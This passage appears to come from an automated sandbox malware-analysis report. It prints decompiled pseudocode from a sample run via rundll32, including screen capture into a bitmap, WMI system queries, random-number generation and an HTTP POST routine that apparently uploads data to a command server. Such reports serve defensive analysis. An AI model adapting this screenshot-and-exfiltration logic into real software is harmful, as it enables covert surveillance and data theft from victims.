            
            				_t1 = HeapCreate(0, 0x96000, 0); // executed
            				 *0x347f9b8 = _t1;
            				return _t1;
            			}

            APIs
            • HeapCreate.KERNELBASE(00000000,00096000,00000000,03466616), ref: 03468DBD
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: CreateHeap
            • String ID:
            • API String ID: 10892065-0
            • Opcode ID: cc1cf0982644e22e81413323b3fa43a0c3a6321049242080f1d7b38d92e80143
            • Instruction ID: 86570de871f121843432171a75b6a6d257e6576e9366da7f41bb4e90bbf0b69b
            • Opcode Fuzzy Hash: cc1cf0982644e22e81413323b3fa43a0c3a6321049242080f1d7b38d92e80143
            • Instruction Fuzzy Hash: 6DB012B06A5300A6DB502B205C46B0075906344B02F200009B709BC1C8C7B010009D14
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 91%
            			E0346DAF2(void* __ecx, intOrPtr _a4, signed int _a8) {
            				signed int _v8;
            				intOrPtr _v12;
            				signed int _t26;
            				signed int _t28;
            				signed int* _t36;
            				signed int* _t39;
            
            				_push(__ecx);
            				_push(__ecx);
            				_t36 = _a8;
            				_t28 = _t36[1];
            				if(_t28 != 0) {
            					_t39 = _t36[2];
            					do {
            						_a8 = _a8 & 0x00000000;
            						if(_t39[2] > 0) {
            							_t31 = _t39[3];
            							_t22 = _a4 + 0x24;
            							_v12 = _a4 + 0x24;
            							_v8 = _t39[3];
            							while(E0346A236(_t22,  *_t31) != 0) {
            								_t26 = _a8 + 1;
            								_t31 = _v8 + 4;
            								_a8 = _t26;
            								_t22 = _v12;
            								_v8 = _v8 + 4;
            								if(_t26 < _t39[2]) {
            									continue;
            								} else {
            								}
            								goto L8;
            							}
            							 *_t36 =  *_t36 |  *_t39;
            						}
            						L8:
            						_t39 =  &(_t39[4]);
            						_t28 = _t28 - 1;
            					} while (_t28 != 0);
            				}
            				Sleep(0xa);
            				return 1;
            			}

            APIs
            • Sleep.KERNELBASE(0000000A), ref: 0346DB5B
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: Sleep
            • String ID:
            • API String ID: 3472027048-0
            • Opcode ID: 47b18520b24951f1a71ac803e055ea8a055cb344e2d463482a3e54f886578df6
            • Instruction ID: 0bd902489928a4de862ebcbeee4cab67f335378600fc4a2e5fdceefff2900d69
            • Opcode Fuzzy Hash: 47b18520b24951f1a71ac803e055ea8a055cb344e2d463482a3e54f886578df6
            • Instruction Fuzzy Hash: 32112D71A00705AFDB14CF99C484AAAB7F8FF4A724F14846EE95ADB304D370E941CB55
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 98%
            			E03465D1E(int* __ecx) {
            				signed int _v8;
            				char _v12;
            				int _v16;
            				struct HWND__* _v20;
            				struct HWND__* _v24;
            				struct HDC__* _v28;
            				void* _v32;
            				int* _v36;
            				void* _v40;
            				void* _v44;
            				void* _v48;
            				void* _v52;
            				void* _v56;
            				intOrPtr _v60;
            				intOrPtr _v64;
            				intOrPtr _v68;
            				intOrPtr _v72;
            				intOrPtr _v76;
            				intOrPtr _v80;
            				short _v82;
            				short _v84;
            				signed int _v88;
            				signed int _v92;
            				struct tagBITMAPINFO _v96;
            				intOrPtr _v102;
            				int _v110;
            				char _v112;
            				void* _v116;
            				void* _v120;
            				void* _v124;
            				void* _v132;
            				void* _v136;
            				void* _v140;
            				int _v156;
            				signed int _v160;
            				void _v164;
            				int _t82;
            				void* _t84;
            				signed int _t92;
            				void* _t99;
            				char _t103;
            				intOrPtr _t113;
            				int* _t114;
            				struct HDC__* _t120;
            				signed int _t124;
            				short _t137;
            				struct HDC__* _t141;
            				void* _t144;
            				void* _t148;
            
            				_v36 = __ecx;
            				_v24 = 0;
            				_t120 = 0;
            				_v12 = 0;
            				_t144 = 0;
            				_v20 = 0;
            				_t141 = GetDC(0);
            				_v28 = _t141;
            				if(_t141 != 0) {
            					_t120 = CreateCompatibleDC(_t141);
            					if(_t120 != 0) {
            						_v8 = GetDeviceCaps(_t141, 8);
            						_t82 = GetDeviceCaps(_t141, 0xa);
            						_v16 = _t82;
            						_t144 = CreateCompatibleBitmap(_t141, _v8, _t82);
            						if(_t144 != 0) {
            							_t84 = SelectObject(_t120, _t144);
            							_v32 = _t84;
            							if(_t84 != 0) {
            								_t144 = SelectObject(_t120, _v32);
            								if(_t144 != 0) {
            									GetObjectW(_t144, 0x18,  &_v164);
            									_t92 = _v160;
            									_t124 = _v156;
            									_v92 = _t92;
            									_v84 = 1;
            									_t137 = 0x20;
            									_v82 = _t137;
            									_v96.bmiHeader = 0x28;
            									_v80 = 0;
            									_v76 = 0;
            									_v72 = 0;
            									_v68 = 0;
            									_v64 = 0;
            									_v60 = 0;
            									asm("cdq");
            									_v88 = _t124;
            									_v8 = ((_t92 << 5) + 0x1f >> 5) * _t124 << 2;
            									_t99 = E03468DC9(((_t92 << 5) + 0x1f >> 5) * _t124 << 2);
            									_v20 = _t99;
            									if(_t99 != 0) {
            										GetDIBits(_t120, _t144, 0, _v156, _t99,  &_v96, 0);
            										_v16 = _v8 + 0x36;
            										_t103 = E03468DC9(_v8 + 0x36);
            										_v12 = _t103;
            										if(_t103 != 0) {
            											_v110 = _v16;
            											_v112 = 0x4d42;
            											_v102 = 0x36;
            											E03468EA6(_t103,  &_v112, 0xe);
            											E03468EA6(_v12 + 0xe,  &_v96, 0x28);
            											E03468EA6(_v12 + 0x36, _v20, _v8);
            											_t148 = _t148 + 0x24;
            											_v8 = _v8 & 0x00000000;
            											_t113 = E0346FBFB(_v12, _v16,  &_v8);
            											_v24 = _t113;
            											if(_t113 != 0) {
            												_t114 = _v36;
            												if(_t114 != 0) {
            													 *_t114 = _v8;
            												}
            											}
            										}
            									}
            								}
            							}
            						}
            					}
            				}
            				E03468DDF( &_v20, 0);
            				E03468DDF( &_v12, 0);
            				if(_t120 != 0) {
            					DeleteDC(_t120);
            				}
            				if(_t141 != 0) {
            					DeleteDC(_t141);
            				}
            				if(_t144 != 0) {
            					DeleteObject(_t144);
            				}
            				return _v24;
            			}

            APIs
            • GetDC.USER32(00000000), ref: 03465D3D
            • CreateCompatibleDC.GDI32(00000000), ref: 03465D51
            • GetDeviceCaps.GDI32(00000000,00000008), ref: 03465D6A
            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 03465D72
            • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 03465D7C
            • SelectObject.GDI32(00000000,00000000), ref: 03465D8E
            • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 03465DB2
            • GetCursorInfo.USER32(?), ref: 03465DC3
            • CopyIcon.USER32 ref: 03465DD8
            • GetIconInfo.USER32(00000000,?), ref: 03465DE6
            • GetObjectW.GDI32(?,00000018,?), ref: 03465E04
            • DrawIconEx.USER32 ref: 03465E1C
            • SelectObject.GDI32(00000000,?), ref: 03465E29
            • GetObjectW.GDI32(00000000,00000018,?), ref: 03465E43
            • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000028,00000000), ref: 03465EBF
            • DeleteDC.GDI32(00000000), ref: 03465F70
            • DeleteDC.GDI32(00000000), ref: 03465F7B
            • DeleteObject.GDI32(00000000), ref: 03465F86
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: Object$DeleteIcon$CapsCompatibleCreateDeviceInfoSelect$BitmapBitsCopyCursorDraw
            • String ID: ($6
            • API String ID: 192358524-4149066357
            • Opcode ID: 4d272a90f821c4978cbc60c2ea9a42f42be5351f2a5e7822306182726406c081
            • Instruction ID: 2af9a0e9278a80cb16c01daaec5cdd4bfa18d3cd8291d732d8147f96f16ee51e
            • Opcode Fuzzy Hash: 4d272a90f821c4978cbc60c2ea9a42f42be5351f2a5e7822306182726406c081
            • Instruction Fuzzy Hash: 95811A75D00219AFDB24DFA5DC49BAEBBB8FF49700F14406AE505FB244EB309A05CB65
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 50%
            			E0346EACA(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
            				signed int _v12;
            				signed int _v16;
            				signed int _v20;
            				char _v24;
            				void* _v28;
            				signed int _v32;
            				char _v36;
            				intOrPtr _v40;
            				signed int _v44;
            				char _v48;
            				char _v52;
            				intOrPtr _v56;
            				signed int _v60;
            				char* _v72;
            				signed short _v80;
            				signed int _v84;
            				char _v88;
            				char _v92;
            				char _v96;
            				intOrPtr _v100;
            				char _v104;
            				char _v616;
            				intOrPtr* _t159;
            				char _t165;
            				signed int _t166;
            				signed int _t173;
            				signed int _t178;
            				signed int _t186;
            				intOrPtr* _t187;
            				signed int _t188;
            				signed int _t192;
            				intOrPtr* _t193;
            				intOrPtr _t200;
            				intOrPtr* _t205;
            				signed int _t207;
            				signed int _t209;
            				intOrPtr* _t210;
            				intOrPtr _t212;
            				intOrPtr* _t213;
            				signed int _t214;
            				char _t217;
            				signed int _t218;
            				signed int _t219;
            				signed int _t230;
            				signed int _t235;
            				signed int _t242;
            				signed int _t243;
            				signed int _t244;
            				signed int _t245;
            				intOrPtr* _t247;
            				intOrPtr* _t251;
            				signed int _t252;
            				intOrPtr* _t253;
            				void* _t255;
            				intOrPtr* _t261;
            				signed int _t262;
            				signed int _t283;
            				signed int _t289;
            				char* _t298;
            				void* _t320;
            				signed int _t322;
            				intOrPtr* _t323;
            				intOrPtr _t324;
            				signed int _t327;
            				intOrPtr* _t328;
            				intOrPtr* _t329;
            
            				_v32 = _v32 & 0x00000000;
            				_v60 = _v60 & 0x00000000;
            				_v56 = __edx;
            				_v100 = __ecx;
            				_t159 = E0346E485(__ecx);
            				_t251 = _t159;
            				_v104 = _t251;
            				if(_t251 == 0) {
            					return _t159;
            				}
            				_t320 = E03468DC9(0x10);
            				_v36 = _t320;
            				_pop(_t255);
            				if(_t320 == 0) {
            					L53:
            					E03468DDF( &_v60, 0xfffffffe);
            					E0346E539( &_v104);
            					return _t320;
            				}
            				_t165 = E03469F85(_t255, 0xcdd);
            				 *_t328 = 0x6b4;
            				_v52 = _t165;
            				_t166 = E03469F85(_t255);
            				_push(0);
            				_push(_v56);
            				_v20 = _t166;
            				_push(_t166);
            				_push(_a4);
            				_t322 = E03469C50(_t165);
            				_v60 = _t322;
            				E03468D9A( &_v52);
            				E03468D9A( &_v20);
            				_t329 = _t328 + 0x20;
            				if(_t322 != 0) {
            					_t323 = __imp__#2;
            					_v40 =  *_t323(_t322);
            					_t173 = E03469F85(_t255, 0xc93);
            					_v20 = _t173;
            					_v52 =  *_t323(_t173);
            					E03468D9A( &_v20);
            					_t324 = _v40;
            					_t261 =  *_t251;
            					_t252 = 0;
            					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
            					__eflags = _t178;
            					if(_t178 != 0) {
            						L52:
            						__imp__#6(_t324);
            						__imp__#6(_v52);
            						goto L53;
            					}
            					_t262 = _v32;
            					_v28 = 0;
            					_v20 = 0;
            					__eflags = _t262;
            					if(_t262 == 0) {
            						L49:
            						 *((intOrPtr*)( *_t262 + 8))(_t262);
            						__eflags = _t252;
            						if(_t252 == 0) {
            							E03468DDF( &_v36, 0);
            							_t320 = _v36;
            						} else {
            							 *(_t320 + 8) = _t252;
            							 *_t320 = E03469AB3(_v100);
            							 *((intOrPtr*)(_t320 + 4)) = E03469AB3(_v56);
            						}
            						goto L52;
            					} else {
            						goto L6;
            					}
            					while(1) {
            						L6:
            						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
            						__eflags = _t186;
            						if(_t186 != 0) {
            							break;
            						}
            						_v16 = 0;
            						_v48 = 0;
            						_v12 = 0;
            						_v24 = 0;
            						__eflags = _v84;
            						if(_v84 == 0) {
            							break;
            						}
            						_t187 = _v28;
            						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
            						__eflags = _t188;
            						if(_t188 >= 0) {
            							__imp__#20(_v24, 1,  &_v16);
            							__imp__#19(_v24, 1,  &_v48);
            							_t46 = _t320 + 0xc; // 0xc
            							_t253 = _t46;
            							_t327 = _t252 << 3;
            							_t47 = _t327 + 8; // 0x8
            							_t192 = E03468E5D(_t327, _t47);
            							__eflags = _t192;
            							if(_t192 == 0) {
            								__imp__#16(_v24);
            								_t193 = _v28;
            								 *((intOrPtr*)( *_t193 + 8))(_t193);
            								L46:
            								_t252 = _v20;
            								break;
            							}
            							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
            							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E03468DC9( *(_t327 +  *_t253) << 3);
            							_t200 =  *_t253;
            							__eflags =  *(_t327 + _t200 + 4);
            							if( *(_t327 + _t200 + 4) == 0) {
            								_t136 = _t320 + 0xc; // 0xc
            								E03468DDF(_t136, 0);
            								E03468DDF( &_v36, 0);
            								__imp__#16(_v24);
            								_t205 = _v28;
            								 *((intOrPtr*)( *_t205 + 8))(_t205);
            								_t320 = _v36;
            								goto L46;
            							}
            							_t207 = _v16;
            							while(1) {
            								_v12 = _t207;
            								__eflags = _t207 - _v48;
            								if(_t207 > _v48) {
            									break;
            								}
            								_v44 = _v44 & 0x00000000;
            								_t209 =  &_v12;
            								__imp__#25(_v24, _t209,  &_v44);
            								__eflags = _t209;
            								if(_t209 < 0) {
            									break;
            								}
            								_t212 = E03469AB3(_v44);
            								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
            								_t213 = _v28;
            								_t281 =  *_t213;
            								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
            								__eflags = _t214;
            								if(_t214 < 0) {
            									L39:
            									__imp__#6(_v44);
            									_t207 = _v12 + 1;
            									__eflags = _t207;
            									continue;
            								}
            								_v92 = E03469F85(_t281, 0xcc1);
            								 *_t329 = 0xabe;
            								_t217 = E03469F85(_t281);
            								_t283 = _v80;
            								_v96 = _t217;
            								_t218 = _t283 & 0x0000ffff;
            								__eflags = _t218 - 0xb;
            								if(__eflags > 0) {
            									_t219 = _t218 - 0x10;
            									__eflags = _t219;
            									if(_t219 == 0) {
            										L35:
            										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E03468DC9(0x18);
            										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
            										__eflags = _t289;
            										if(_t289 == 0) {
            											L38:
            											E03468D9A( &_v92);
            											E03468D9A( &_v96);
            											__imp__#9( &_v80);
            											goto L39;
            										}
            										_push(_v72);
            										_push(L"%d");
            										L37:
            										_push(0xc);
            										_push(_t289);
            										E03469FE4();
            										_t329 = _t329 + 0x10;
            										goto L38;
            									}
            									_t230 = _t219 - 1;
            									__eflags = _t230;
            									if(_t230 == 0) {
            										L33:
            										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E03468DC9(0x18);
            										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
            										__eflags = _t289;
            										if(_t289 == 0) {
            											goto L38;
            										}
            										_push(_v72);
            										_push(L"%u");
            										goto L37;
            									}
            									_t235 = _t230 - 1;
            									__eflags = _t235;
            									if(_t235 == 0) {
            										goto L33;
            									}
            									__eflags = _t235 == 1;
            									if(_t235 == 1) {
            										goto L33;
            									}
            									L28:
            									__eflags = _t283 & 0x00002000;
            									if((_t283 & 0x00002000) == 0) {
            										_v88 = E03469F85(_t283, 0x2a);
            										E03469FE4( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
            										E03468D9A( &_v88);
            										_t329 = _t329 + 0x18;
            										_t298 =  &_v616;
            										L31:
            										_t242 = E03469AB3(_t298);
            										L32:
            										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
            										goto L38;
            									}
            									_t242 = E0346E9AE( &_v80);
            									goto L32;
            								}
            								if(__eflags == 0) {
            									__eflags = _v72 - 0xffff;
            									_t298 = L"TRUE";
            									if(_v72 != 0xffff) {
            										_t298 = L"FALSE";
            									}
            									goto L31;
            								}
            								_t243 = _t218 - 1;
            								__eflags = _t243;
            								if(_t243 == 0) {
            									goto L38;
            								}
            								_t244 = _t243 - 1;
            								__eflags = _t244;
            								if(_t244 == 0) {
            									goto L35;
            								}
            								_t245 = _t244 - 1;
            								__eflags = _t245;
            								if(_t245 == 0) {
            									goto L35;
            								}
            								__eflags = _t245 != 5;
            								if(_t245 != 5) {
            									goto L28;
            								}
            								_t298 = _v72;
            								goto L31;
            							}
            							__imp__#16(_v24);
            							_t210 = _v28;
            							 *((intOrPtr*)( *_t210 + 8))(_t210);
            							_t252 = _v20;
            							L42:
            							_t262 = _v32;
            							_t252 = _t252 + 1;
            							_v20 = _t252;
            							__eflags = _t262;
            							if(_t262 != 0) {
            								continue;
            							}
            							L48:
            							_t324 = _v40;
            							goto L49;
            						}
            						_t247 = _v28;
            						 *((intOrPtr*)( *_t247 + 8))(_t247);
            						goto L42;
            					}
            					_t262 = _v32;
            					goto L48;
            				} else {
            					E03468DDF( &_v36, _t322);
            					_t320 = _v36;
            					goto L53;
            				}
            			}

            APIs
              • Part of subcall function 0346E485: CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,0346E7B4,00000E16,00000000,00000000,00000005), ref: 0346E498
              • Part of subcall function 0346E485: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,0346E7B4,00000E16,00000000,00000000,00000005), ref: 0346E4A9
              • Part of subcall function 0346E485: CoCreateInstance.OLE32(0347C8A0,00000000,00000001,0347C8B0,00000000,?,0346E7B4,00000E16,00000000,00000000,00000005), ref: 0346E4C0
              • Part of subcall function 0346E485: SysAllocString.OLEAUT32(00000000), ref: 0346E4CB
              • Part of subcall function 0346E485: CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,0346E7B4,00000E16,00000000,00000000,00000005), ref: 0346E4F6
              • Part of subcall function 03468DC9: RtlAllocateHeap.NTDLL(00000008,?,?,03469793,00000100,?,0346661B), ref: 03468DD7
            • SysAllocString.OLEAUT32(00000000), ref: 0346EB73
            • SysAllocString.OLEAUT32(00000000), ref: 0346EB87
            • SysFreeString.OLEAUT32(?), ref: 0346EF0D
            • SysFreeString.OLEAUT32(?), ref: 0346EF16
              • Part of subcall function 03468DDF: HeapFree.KERNEL32(00000000,00000000), ref: 03468E25
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
            • String ID: FALSE$TRUE
            • API String ID: 1290676130-1412513891
            • Opcode ID: cd42b6efefc8660a8932cf39d3edf5ac6dc2ea07fb83eadadd1515428501d05f
            • Instruction ID: 21778e6771821af30d9c45b09774d95227958918ec0c8e9432a4ad2bf4a72c8d
            • Opcode Fuzzy Hash: cd42b6efefc8660a8932cf39d3edf5ac6dc2ea07fb83eadadd1515428501d05f
            • Instruction Fuzzy Hash: 87E17B7AE00219AFCB14EFA4C984AEEBBF9FF48300F14445EE515AF285DB70A941CB55
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 30%
            			E03472951(intOrPtr* _a4) {
            				signed int _v8;
            				_Unknown_base(*)()* _v12;
            				char _v16;
            				_Unknown_base(*)()* _t15;
            				void* _t20;
            				intOrPtr* _t25;
            				intOrPtr* _t29;
            				struct HINSTANCE__* _t30;
            
            				_v8 = _v8 & 0x00000000;
            				_t30 = GetModuleHandleW(L"advapi32.dll");
            				if(_t30 == 0) {
            					L7:
            					return 1;
            				}
            				_t25 = GetProcAddress(_t30, "CryptAcquireContextA");
            				if(_t25 == 0) {
            					goto L7;
            				}
            				_t15 = GetProcAddress(_t30, "CryptGenRandom");
            				_v12 = _t15;
            				if(_t15 == 0) {
            					goto L7;
            				}
            				_t29 = GetProcAddress(_t30, "CryptReleaseContext");
            				if(_t29 == 0) {
            					goto L7;
            				}
            				_push(0xf0000000);
            				_push(1);
            				_push(0);
            				_push(0);
            				_push( &_v8);
            				if( *_t25() == 0) {
            					goto L7;
            				}
            				_t20 = _v12(_v8, 4,  &_v16);
            				 *_t29(_v8, 0);
            				if(_t20 == 0) {
            					goto L7;
            				}
            				 *_a4 = E034728AC( &_v16);
            				return 0;
            			}

            APIs
            • GetModuleHandleW.KERNEL32(advapi32.dll,00000000,00000000,00000000,03467C84), ref: 03472963
            • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 0347297B
            • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 03472989
            • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 03472998
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: AddressProc$HandleModule
            • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
            • API String ID: 667068680-129414566
            • Opcode ID: da6b276536d554812c327959688ce467fe0811ac184c80ea5f37be49752bd606
            • Instruction ID: 8f0dda32d9b8950f0c45cd5803ce4292e3bcd5a0ecf76269d3497bc20e17f516
            • Opcode Fuzzy Hash: da6b276536d554812c327959688ce467fe0811ac184c80ea5f37be49752bd606
            • Instruction Fuzzy Hash: A911A977F44319BBDB51E6B58C42FDFB6AC9F44650F290562EA00FA240DBB0DE008A58
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 93%
            			E0346F7A3(void* __edx, intOrPtr _a4, intOrPtr _a8, signed int* _a12, signed int* _a16, signed int* _a20, signed int _a24) {
            				signed int _v8;
            				signed int _v12;
            				char _v16;
            				char _v20;
            				char _v24;
            				intOrPtr _v28;
            				int _v32;
            				signed int _v36;
            				intOrPtr _v40;
            				intOrPtr _v44;
            				intOrPtr _v48;
            				intOrPtr _v52;
            				char _v56;
            				int _v68;
            				void* _v72;
            				intOrPtr _v92;
            				int _v96;
            				void* _v100;
            				intOrPtr _v104;
            				intOrPtr _v108;
            				char* _v112;
            				char _v116;
            				char _v132;
            				void _v388;
            				void _v644;
            				intOrPtr _t94;
            				intOrPtr _t102;
            				signed int _t104;
            				intOrPtr* _t105;
            				intOrPtr _t110;
            				signed int _t111;
            				signed int _t112;
            				intOrPtr _t115;
            				signed int _t116;
            				char _t117;
            				intOrPtr _t119;
            				char _t122;
            				intOrPtr _t127;
            				signed int _t129;
            				intOrPtr _t135;
            				intOrPtr _t139;
            				intOrPtr _t143;
            				intOrPtr _t145;
            				intOrPtr _t147;
            				intOrPtr _t153;
            				intOrPtr _t155;
            				intOrPtr _t159;
            				void* _t163;
            				signed int _t165;
            				void* _t166;
            				intOrPtr _t179;
            				signed int _t186;
            				char _t188;
            				signed int _t189;
            				void* _t190;
            				char _t193;
            				signed int _t194;
            				signed int _t195;
            				void* _t196;
            
            				_v24 = 4;
            				_v32 = 0;
            				_v28 = 1;
            				_t190 = __edx;
            				memset( &_v388, 0, 0x100);
            				memset( &_v644, 0, 0x100);
            				_t166 = 0x65;
            				_v56 = E03469F6B(_t166);
            				_v52 = E03469F6B(0xcc6);
            				_v48 = E03469F6B(0xe03);
            				_v44 = E03469F6B(0x64c);
            				_t94 = E03469F6B(0x80a);
            				_v36 = _v36 & 0;
            				_t188 = 0x3c;
            				_v40 = _t94;
            				E03468F63( &_v116, 0, 0x100);
            				_v108 = 0x10;
            				_v112 =  &_v132;
            				_v116 = _t188;
            				_v100 =  &_v388;
            				_v96 = 0x100;
            				_v72 =  &_v644;
            				_push( &_v116);
            				_push(0);
            				_v68 = 0x100;
            				_push(E0346A5D0(_t190));
            				_t102 =  *0x347f8f0; // 0x0
            				_push(_t190);
            				if( *((intOrPtr*)(_t102 + 0x28))() != 0) {
            					_t104 = 0;
            					__eflags = 0;
            					_v12 = 0;
            					do {
            						_t105 =  *0x347f8f0; // 0x0
            						_v8 = 0x8404f700;
            						_t189 =  *_t105( *0x347f9d8,  *((intOrPtr*)(_t196 + _t104 * 4 - 0x1c)), 0, 0, 0);
            						__eflags = _t189;
            						if(_t189 != 0) {
            							E0346F73B(_t189);
            							_t110 =  *0x347f8f0; // 0x0
            							_t111 =  *((intOrPtr*)(_t110 + 0x1c))(_t189,  &_v388, _v92, 0, 0, 3, 0, 0);
            							__eflags = _a24;
            							_t165 = _t111;
            							if(_a24 != 0) {
            								E0346A1F8(_a24);
            							}
            							__eflags = _t165;
            							if(_t165 != 0) {
            								__eflags = _v104 - 4;
            								_t112 = 0x8484f700;
            								if(_v104 != 4) {
            									_t112 = _v8;
            								}
            								_t115 =  *0x347f8f0; // 0x0
            								_t116 =  *((intOrPtr*)(_t115 + 0x20))(_t165, "POST",  &_v644, 0, 0,  &_v56, _t112, 0);
            								_v8 = _t116;
            								__eflags = _a24;
            								if(_a24 != 0) {
            									E0346A1F8(_a24);
            									_t116 = _v8;
            								}
            								__eflags = _t116;
            								if(_t116 != 0) {
            									__eflags = _v104 - 4;
            									if(_v104 == 4) {
            										E0346F6E9(_t116);
            									}
            									_t117 = E03469F6B(0x82e);
            									_t193 = _t117;
            									_v16 = _t193;
            									_t119 =  *0x347f8f0; // 0x0
            									_t194 = _v8;
            									_v8 =  *((intOrPtr*)(_t119 + 0x24))(_t194, _t193, E0346A5D0(_t193), _a4, _a8);
            									E03468D87( &_v16);
            									__eflags = _a24;
            									if(_a24 != 0) {
            										E0346A1F8(_a24);
            									}
            									__eflags = _v8;
            									if(_v8 != 0) {
            										L25:
            										_t122 = 8;
            										_v24 = _t122;
            										_v20 = 0;
            										_v16 = 0;
            										E03468F63( &_v20, 0, _t122);
            										_t127 =  *0x347f8f0; // 0x0
            										__eflags =  *((intOrPtr*)(_t127 + 0xc))(_t194, 0x13,  &_v20,  &_v24, 0);
            										if(__eflags != 0) {
            											_t129 = E0346A102( &_v20, __eflags);
            											__eflags = _t129 - 0xc8;
            											if(_t129 == 0xc8) {
            												 *_a20 = _t194;
            												 *_a12 = _t189;
            												 *_a16 = _t165;
            												__eflags = 0;
            												return 0;
            											}
            											_v12 =  ~_t129;
            											L29:
            											_t135 =  *0x347f8f0; // 0x0
            											 *((intOrPtr*)(_t135 + 8))(_t194);
            											_t195 = _v12;
            											L30:
            											__eflags = _t165;
            											if(_t165 != 0) {
            												_t139 =  *0x347f8f0; // 0x0
            												 *((intOrPtr*)(_t139 + 8))(_t165);
            											}
            											__eflags = _t189;
            											if(_t189 != 0) {
            												_t179 =  *0x347f8f0; // 0x0
            												 *((intOrPtr*)(_t179 + 8))(_t189);
            											}
            											return _t195;
            										}
            										GetLastError();
            										_v12 = 0xfffffff8;
            										goto L29;
            									} else {
            										GetLastError();
            										_t143 =  *0x347f8f0; // 0x0
            										 *((intOrPtr*)(_t143 + 8))(_t194);
            										_t145 =  *0x347f8f0; // 0x0
            										_v8 = _v8 & 0x00000000;
            										 *((intOrPtr*)(_t145 + 8))(_t165);
            										_t147 =  *0x347f8f0; // 0x0
            										_t165 = 0;
            										__eflags = 0;
            										 *((intOrPtr*)(_t147 + 8))(_t189);
            										_t194 = _v8;
            										goto L21;
            									}
            								} else {
            									GetLastError();
            									_t153 =  *0x347f8f0; // 0x0
            									 *((intOrPtr*)(_t153 + 8))(_t165);
            									_t155 =  *0x347f8f0; // 0x0
            									_t165 = 0;
            									 *((intOrPtr*)(_t155 + 8))(_t189);
            									_t189 = 0;
            									_t194 = _v8;
            									goto L22;
            								}
            							} else {
            								GetLastError();
            								_t159 =  *0x347f8f0; // 0x0
            								 *((intOrPtr*)(_t159 + 8))(_t189);
            								L21:
            								_t189 = 0;
            								__eflags = 0;
            								goto L22;
            							}
            						}
            						GetLastError();
            						L22:
            						_t186 = _t194;
            						_t104 = _v12 + 1;
            						_v12 = _t104;
            						__eflags = _t104 - 2;
            					} while (_t104 < 2);
            					__eflags = _t186;
            					if(_t186 != 0) {
            						goto L25;
            					}
            					_t195 = 0xfffffffe;
            					goto L30;
            				}
            				_t163 = 0xfffffffc;
            				return _t163;
            			}

            APIs
            • memset.MSVCRT ref: 0346F7D4
            • memset.MSVCRT ref: 0346F7E5
              • Part of subcall function 03468F63: memset.MSVCRT ref: 03468F75
            • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 0346F8BA
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
